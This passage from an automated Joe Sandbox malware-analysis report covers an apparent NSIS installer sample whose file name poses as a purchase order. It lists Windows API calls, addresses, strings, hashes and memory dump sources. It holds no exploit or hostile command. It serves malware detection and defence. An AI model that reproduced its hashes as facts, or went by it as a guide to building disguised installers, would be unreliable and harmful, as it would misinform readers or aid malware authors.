                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 1813718867-2502969717
                                                  • Opcode ID: 6ad6d118b66c6cdac93a21cf44a1797848e74ee065974fce26df8e3808a08917
                                                  • Instruction ID: 48c25345ab5c6186891d52a8fabce3a967a0262862fdddf466c19d710b4311b7
                                                  • Opcode Fuzzy Hash: 6ad6d118b66c6cdac93a21cf44a1797848e74ee065974fce26df8e3808a08917
                                                  • Instruction Fuzzy Hash: EDF1E571604301AAD720AF659D05B2B7EE8EB8570AF10483EF581B22D1DB7CDA45CB6E
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,771B3420,771B2EE0,00434000), ref: 00405DD7
                                                  • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,771B3420,771B2EE0,00434000), ref: 00405E1F
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,771B3420,771B2EE0,00434000), ref: 00405E42
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,771B3420,771B2EE0,00434000), ref: 00405E48
                                                  • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,771B3420,771B2EE0,00434000), ref: 00405E58
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                  • FindClose.KERNEL32(00000000), ref: 00405F07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: POB$\*.*
                                                  • API String ID: 2035342205-2418784330
                                                  • Opcode ID: 6622ab5639dd30ba5a14c76c08f849f60dd3b1310bdf1729716a2bece7885b77
                                                  • Instruction ID: 08bfc2840413863968cf962241dff1eb28b75ffaef7a08e493f25e9a85e6eaf1
                                                  • Opcode Fuzzy Hash: 6622ab5639dd30ba5a14c76c08f849f60dd3b1310bdf1729716a2bece7885b77
                                                  • Instruction Fuzzy Hash: E341F130800A06A6CB21AB61CD89BBF7278EF45754F14413FF485B11C1DB7C4A82DEAE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q$6(7
                                                  • API String ID: 0-2873392606
                                                  • Opcode ID: dcf9f50a12f4e23ae7ad4a6c0f4098b95fb5311a4273fee83abb4ef4bf831790
                                                  • Instruction ID: ad144fc7f3033688ac84d0b80c2f1f12a38f34c071f4c76f4694bdbf8456feda
                                                  • Opcode Fuzzy Hash: dcf9f50a12f4e23ae7ad4a6c0f4098b95fb5311a4273fee83abb4ef4bf831790
                                                  • Instruction Fuzzy Hash: F7121974A00619CFDB24DB65D851A9EB7F2BFC9300F2085A9D40AAB259DF309D86CB80
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                  • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                  • GetClientRect.USER32(?,?), ref: 00405910
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                  • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                  • ShowWindow.USER32(00000000), ref: 00405A5F
                                                  • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                  • ShowWindow.USER32(00000008), ref: 00405AAE
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                  • CreatePopupMenu.USER32 ref: 00405AF3
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                  • GetWindowRect.USER32(?,?), ref: 00405B27
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                  • OpenClipboard.USER32(00000000), ref: 00405B88
                                                  • EmptyClipboard.USER32 ref: 00405B8E
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                  • CloseClipboard.USER32 ref: 00405BE9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: H/B${
                                                  • API String ID: 590372296-332483393
                                                  • Opcode ID: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                  • Instruction ID: 26959a90f0a266772171a70e0d2c3eddd0d3dcd8a9821819e75e01dae6d4cf8f
                                                  • Opcode Fuzzy Hash: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                  • Instruction Fuzzy Hash: 1EB158B0900608FFEB11AF60DD859AE7B79FB08354F00413AFA45BA1A0CB785E51DF68
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                  • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                  • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                  • DeleteObject.GDI32(00000000), ref: 00405188
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                  • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                  • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                  • GlobalFree.KERNEL32(?), ref: 004054C8
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                  • ShowWindow.USER32(?,00000000), ref: 00405672
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                  • ShowWindow.USER32(00000000), ref: 00405684
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction ID: 34ca0daebb1283ae0dea41fcbe79f03df20d3d5ccd25e7298a94edbde83860af
                                                  • Opcode Fuzzy Hash: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction Fuzzy Hash: F5028C70A00609AFDB20DF55CD45AAF7BB5FB84314F50857AF910BA2E1D7B98A42CF18
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                  • ShowWindow.USER32(?), ref: 0040417E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                  • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                  • DestroyWindow.USER32 ref: 004041BD
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                  • GetDlgItem.USER32(?,?), ref: 004041F5
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                  • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                  • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                  • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                  • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                  • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                  • EnableWindow.USER32(?,?), ref: 00404409
                                                  • EnableWindow.USER32(?,?), ref: 00404424
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                  • EnableMenuItem.USER32(00000000), ref: 00404441
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                  • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404496
                                                  • SetWindowTextW.USER32(?,00422F48), ref: 004044AA
                                                  • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: H/B
                                                  • API String ID: 1860320154-184950203
                                                  • Opcode ID: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction ID: 9a8659dd655c0040c26f3da6c71aaed3cdb3e7512c47e66a19b3526095f1ef41
                                                  • Opcode Fuzzy Hash: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction Fuzzy Hash: 0FC1CEB1600604BBDB216F61EE85E2B7A68FB85345F41093EF741B25F0CB799842DB2D
                                                  APIs
                                                    • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                    • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                  • lstrcatW.KERNEL32(00436000,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,771B3420,00436800,00000000,00434000,00008001), ref: 00403DF5
                                                  • lstrlenW.KERNEL32(00427A00,?,?,?,00427A00,00000000,00434800,00436000,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,771B3420), ref: 00403E75
                                                  • lstrcmpiW.KERNEL32(004279F8,.exe,00427A00,?,?,?,00427A00,00000000,00434800,00436000,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E88
                                                  • GetFileAttributesW.KERNEL32(00427A00), ref: 00403E93
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403EDC
                                                    • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                  • RegisterClassW.USER32(00428A00), ref: 00403F19
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FC8
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FD5
                                                  • RegisterClassW.USER32(00428A00), ref: 00403FDE
                                                  • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-3957238721
                                                  • Opcode ID: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction ID: c4c704bd5297fd73affe36db923882850e9d0fe41f98d1713f1e709c6875f219
                                                  • Opcode Fuzzy Hash: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction Fuzzy Hash: E061C670240701BAD620AB66AD46F2B3A7CEB85745F41453FF941B22E2DF7D5D02CA2D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                  • GetSysColor.USER32(?), ref: 004048C0
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                  • lstrlenW.KERNEL32(?), ref: 004048E1
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                  • SendMessageW.USER32(00000000), ref: 00404963
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                  • SetCursor.USER32(00000000), ref: 004049E2
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                  • SetCursor.USER32(00000000), ref: 004049FE
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: N$WG@
                                                  • API String ID: 3103080414-2930149691
                                                  • Opcode ID: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction ID: 54d9d544d8a339ed1f673c4731e81340660bcd02aea44dc88bd758a97d32eb83
                                                  • Opcode Fuzzy Hash: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction Fuzzy Hash: 2B61A0B1A40209BFDB10AF64CD85AAA7B69FB84314F00843AF605B72D0C779AD51CF98
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                  • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040632C
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                  • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406349
                                                  • wsprintfA.USER32 ref: 00406367
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 004063A2
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,00437800,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                  • API String ID: 2171350718-2529913679
                                                  • Opcode ID: e6891909890e267c24b8bd553358289a36bdaf0c1f8090d9d78c2674567931e5
                                                  • Instruction ID: 9150ff15d44dd6ac7e39c2a3973aa46bc34ee9e674c79fba1fcd409278ee571c
                                                  • Opcode Fuzzy Hash: e6891909890e267c24b8bd553358289a36bdaf0c1f8090d9d78c2674567931e5
                                                  • Instruction Fuzzy Hash: A0312370600325BBD2206F65AD49F6B3A5CDF41754F12403AFA02B62D3DA7CD82586BD
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                  • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                  • lstrcmpiW.KERNEL32(00427A00,00422F48,00000000,?,?), ref: 00404C79
                                                  • lstrcatW.KERNEL32(?,00427A00), ref: 00404C85
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                    • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00000400,00404CCE), ref: 00405CF9
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,00434000,771B3420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                    • Part of subcall function 00406950: CharPrevW.USER32(?,?,771B3420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D5A
